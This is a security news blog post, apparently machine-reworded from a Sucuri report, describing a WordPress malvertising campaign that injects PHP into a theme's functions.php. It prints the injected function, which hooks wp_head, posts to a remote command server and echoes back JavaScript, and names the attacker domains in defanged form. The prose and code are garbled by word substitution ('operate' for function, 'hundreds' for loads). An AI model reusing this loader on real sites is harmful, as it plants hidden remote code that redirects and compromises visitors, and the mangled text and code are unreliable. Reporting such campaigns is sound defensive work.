Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently

Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently

Posted on October 8, 2025October 8, 2025 By CWS

WordPress web sites have change into a chief goal for menace actors searching for to monetize site visitors and compromise customer safety.

In current months, a brand new malvertising marketing campaign has emerged, leveraging silent PHP code injections inside theme information to serve undesirable third-party scripts.

The assault blends seamlessly with respectable web site operations, delivering obfuscated JavaScript that redirects guests, shows pop-ups, and evades safety instruments with out elevating suspicion.

Initially found by a web site proprietor noticing unexplained script hundreds, the intrusion originated from a small block of PHP code appended to the lively theme’s features.php file.

This injection didn’t alter seen web page content material, as an alternative executing behind the scenes on each request.

Sucuri analysts recognized the marketing campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by a number of safety distributors.

The assault primarily exploits weak file permissions and outdated themes. By gaining write entry—usually by means of compromised credentials or susceptible plugins—hackers insert a seemingly benign operate that contacts a command-and-control server.

As soon as invoked by way of the wp_head hook, the operate fetches a dynamic JavaScript payload and echoes it into the web page’s part, making certain execution earlier than the remainder of the web page hundreds.

Sucuri researchers famous that the injected operate establishes a POST connection to a distant endpoint at hxxps://brazilc[.]com/advertisements.php, retrieves the malicious script, and embeds it instantly into the HTML doc.

The payload performs two essential actions: loading a traffic-distribution script from porsasystem.com/6m9x.js and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s problem platform.

These strategies allow pressured redirects, pop-ups, and evasion of safety scanners by disguising malicious exercise as respectable CDN operations.

An infection Mechanism

The an infection mechanism hinges on the next PHP operate injected into features.php:-

// Injected PHP operate in features.php
operate ti_custom_javascript() {
$response = wp_remote_post(
‘
array(‘timeout’ => 15, ‘physique’ => array(‘url’ => home_url()))
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action(‘wp_head’, ‘ti_custom_javascript’);

Upon every web page load, this operate silently executes, contacting the C&C server and printing the returned JavaScript payload into the web page header.

Payload (Supply – Sucuri)

The attacker’s script then hundreds additional malicious code asynchronously, leveraging attributes like data-cfasync=”false” and async to bypass Cloudflare Rocket Loader.

By embedding inside a hidden iframe, the malware evades detection and resides persistently till the injected code is eliminated.

Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Codes, Hackers, Injecting, Malicious, PHP, Silently, Weaponizing, Websites, WordPress

Post navigation

Previous Post: CISA Warns of Zimbra Collaboration Suite (ZCS) XSS Zero-Day Vulnerability Actively Exploited in Attacks
Next Post: DraftKings Warns Users of Credential Stuffing Attacks

Related Posts

1inch partners with Innerworks to strengthen DeFi security through AI-Powered threat detection 1inch partners with Innerworks to strengthen DeFi security through AI-Powered threat detection Cyber Security News
EU’s Digital Age App Vulnerable to Quick Hacking EU’s Digital Age App Vulnerable to Quick Hacking Cyber Security News
North Korean Hackers Exploit Git Hooks for Malware Deployment North Korean Hackers Exploit Git Hooks for Malware Deployment Cyber Security News
Chinese Hackers Exploit Microsoft Exchange Servers to Steal COVID-19 Research Data Chinese Hackers Exploit Microsoft Exchange Servers to Steal COVID-19 Research Data Cyber Security News
Hands-on Cybersecurity Threat Hunting Guide for SOC Analysts and MSSPs Hands-on Cybersecurity Threat Hunting Guide for SOC Analysts and MSSPs Cyber Security News
Potential Wallet Phishing Campaign Targets Cardano Users via ‘Eternl Desktop’ Announcement Potential Wallet Phishing Campaign Targets Cardano Users via ‘Eternl Desktop’ Announcement Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Vulnerability in PraisonAI Exploited Within Hours
  • Langflow Vulnerability Exploited for AWS Key Theft
  • VMware Fusion Vulnerability Receives Critical Update
  • Critical Vulnerability in MongoDB Risks Data Exposure
  • Windows Zero-Day Exploits: YellowKey and GreenPlasma Revealed

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Vulnerability in PraisonAI Exploited Within Hours
  • Langflow Vulnerability Exploited for AWS Key Theft
  • VMware Fusion Vulnerability Receives Critical Update
  • Critical Vulnerability in MongoDB Risks Data Exposure
  • Windows Zero-Day Exploits: YellowKey and GreenPlasma Revealed

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark